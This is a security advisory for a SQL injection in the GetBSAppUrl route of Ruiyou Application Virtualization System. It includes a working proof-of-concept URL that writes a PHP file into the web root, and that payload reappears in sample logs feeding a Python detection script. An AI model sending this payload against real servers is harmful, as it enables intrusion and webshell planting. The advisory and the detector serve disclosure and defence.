Ruiyou Application Virtualization System GetBSAppUrl SQL Injection Vulnerability
Vulnerability Description
The GetBSAppUrl method of the Ruiyou Application Virtualization System has a SQL injection vulnerability. Because the incoming parameter is not filtered, it is concatenated into the query and SQL injection occurs. An attacker can obtain sensitive database information through this vulnerability.
Vulnerability Impact
Ruiyou Application Virtualization System 7.0.2.1
Network Mapping
Vulnerability Reproduction
Login page
There is a SQL injection vulnerability in the GetBSAppUrl method; through it a webshell file can be written to the web root.
Verification PoC
/index.php?s=/Agent/GetBSAppUrl/AppID/')%3bselect+0x3c3f70687020706870696e666f28293b3f3e+into+outfile+%27C%3a\\Program+Files+(x86)\\RealFriend\\Rap+Server\\WebRoot\\test7.php%27%23/123
/test7.php
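As an added defender-side example (not part of the original advisory), the following Python checks web-server access logs for the injection pattern this advisory describes on the GetBSAppUrl route, and correlates it with any later request for a file named in an "into outfile" clause. The log lines, client IPs and timestamps are constructed; the file name mirrors the PoC above.

```python
"""Detection for the GetBSAppUrl SQL injection and the webshell it drops."""
import re
from urllib.parse import unquote_plus

# Constructed sample access log (common log format); not real traffic.
SAMPLE_LOG = r"""
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?s=/Agent/GetBSAppUrl/AppID/1001 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?s=/Agent/GetBSAppUrl/AppID/')%3bselect+0x3c3f70687020706870696e666f28293b3f3e+into+outfile+%27C%3a\\Program+Files+(x86)\\RealFriend\\Rap+Server\\WebRoot\\test7.php%27%23/123 HTTP/1.1" 200 0
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /test7.php HTTP/1.1" 200 70000
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?s=/Agent/Login HTTP/1.1" 200 1024
"""

REQ_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')
APPID_RE = re.compile(r"/Agent/GetBSAppUrl/AppID/(?P<value>.*)$", re.IGNORECASE)
OUTFILE_RE = re.compile(r"into\s+(?:out|dump)file\s+'([^']+)'", re.IGNORECASE)
# Indicators that the AppID route segment breaks out of the intended query.
INDICATORS = {
    "quote_break": re.compile(r"""['"]"""),
    "stacked_query": re.compile(r";\s*(select|insert|update|delete|union)\b", re.IGNORECASE),
    "file_write": re.compile(r"\binto\s+(out|dump)file\b", re.IGNORECASE),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{8,}\b", re.IGNORECASE),
}


def analyze_log(text):
    """Return alerts (dicts) for injection attempts and follow-up webshell hits."""
    alerts = []
    dropped = set()  # basenames named in an 'into outfile' clause so far
    for line in text.splitlines():
        m = REQ_RE.match(line)
        if not m:
            continue
        path = unquote_plus(m.group("path"))  # decode %xx and '+' once
        # Rule 1: injection indicators inside the AppID route segment.
        a = APPID_RE.search(path)
        if a:
            value = a.group("value")
            hits = sorted(k for k, rx in INDICATORS.items() if rx.search(value))
            if hits:
                alerts.append({"src": m.group("src"), "kind": "getbsappurl_sqli", "indicators": hits})
                of = OUTFILE_RE.search(value)
                if of:  # remember the written file so later access to it is flagged
                    dropped.add(of.group(1).replace("\\", "/").rsplit("/", 1)[-1].lower())
        # Rule 2: a request for a file that an earlier injection wrote to the web root.
        base = path.split("?", 1)[0].rsplit("/", 1)[-1].lower()
        if base in dropped:
            alerts.append({"src": m.group("src"), "kind": "webshell_access", "file": base})
    return alerts
```

Feed real access logs to analyze_log in place of SAMPLE_LOG; the second rule only fires after the first has seen the write, so run it over the full day's log rather than a tail.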
This post is licensed under CC BY 4.0 by the author.